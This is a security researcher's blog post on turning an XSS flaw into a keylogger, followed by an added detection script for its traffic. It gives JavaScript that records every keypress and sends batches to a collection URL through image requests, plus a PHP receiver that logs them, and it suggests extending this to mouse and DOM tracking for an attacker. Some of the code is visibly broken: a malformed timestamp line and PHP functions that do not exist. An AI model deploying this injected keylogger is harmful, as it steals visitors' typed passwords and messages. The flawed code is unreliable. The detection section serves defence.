How do you use an XSS as a keylogger?

My name is Ismail Tasdelen, and I am a security researcher. Today I will be talking about how an XSS vulnerability can be used as a keylogger. After this post, you'll see why an XSS vulnerability can be a critical vulnerability.

var buffer = [];
var url = 'http://localhost/?q='
document.onkeypress = function(e) {
    var timestamp = | 0;
    var stroke = {
        k: e.key,
        t: timestamp
    };
    buffer.push(stroke);
}
window.setInterval(function() {
    if (buffer.length > 0) {
        var data = encodeURIComponent(JSON.stringify(buffer));
        new Image().src = url + data;
        buffer = [];
    }
}, 200);

Using this JavaScript together with a PHP server, you can create a keylogger server.

<?php
if(!empty($_GET['q'])) {
    $logfile = fopen('data.txt', 'a+');
    file_write($log_file, $_GET['q']);
    file_close($log_file);
}
?>

This story covers only a very small part of what a JavaScript backdoor is able to achieve. A good improvement would be to monitor mouse position and DOM elements and send everything to the attacker in real time using WebSockets.

And not only that. Remote means you are running malicious JavaScript code towards the server. The rest is limited only by your imagination and ability.
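On the detection side, the script in this post sends its buffer as a URL-encoded JSON array of {k, t} objects in a GET query string, which is a recognisable pattern in proxy or egress logs. The following is an added example, not code from the original post; the log layout, host names and the functions parseKeystrokeBeacon and findBeacons are assumptions made for illustration.

```javascript
// Added example: flag proxy-log requests whose query string carries the keystroke
// buffer format from the post. Log layout and sample lines are constructed.

// Return the decoded keystroke records if `value` matches the beacon format, else null.
function parseKeystrokeBeacon(value) {
  let parsed;
  try {
    parsed = JSON.parse(value);
  } catch (err) {
    return null; // not JSON at all
  }
  if (!Array.isArray(parsed) || parsed.length === 0) return null;
  const ok = parsed.every(
    (s) => s !== null && typeof s === 'object' &&
           typeof s.k === 'string' && typeof s.t === 'number'
  );
  return ok ? parsed : null;
}

// Scan log lines of the assumed form "<client> <METHOD> <absolute URL>".
function findBeacons(lines) {
  const hits = [];
  for (const line of lines) {
    const [client, method, rawUrl] = line.trim().split(/\s+/);
    if (method !== 'GET' || !rawUrl) continue;
    let url;
    try {
      url = new URL(rawUrl);
    } catch (err) {
      continue; // malformed URL in the log line
    }
    // Check every parameter, since the name "q" is trivially changed.
    for (const [name, value] of url.searchParams) {
      const strokes = parseKeystrokeBeacon(value);
      if (strokes) hits.push({ client, host: url.host, param: name, keys: strokes.length });
    }
  }
  return hits;
}

// Constructed sample proxy log: one beacon, three benign requests.
const sampleLog = [
  '10.0.0.5 GET http://collector.example/?q=%5B%7B%22k%22%3A%22p%22%2C%22t%22%3A1700000000%7D%2C%7B%22k%22%3A%22w%22%2C%22t%22%3A1700000001%7D%5D',
  '10.0.0.5 GET http://shop.example/search?q=blue%20shoes',
  '10.0.0.7 GET http://api.example/items?filter=%5B1%2C2%2C3%5D',
  '10.0.0.9 POST http://shop.example/login',
];

console.log(findBeacons(sampleLog));
```

Because the script flushes its buffer every 200 ms, a single client typing into a form produces a burst of such requests to one host, which makes a per-client rate threshold a useful second signal.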

Thanks @openbugbounty
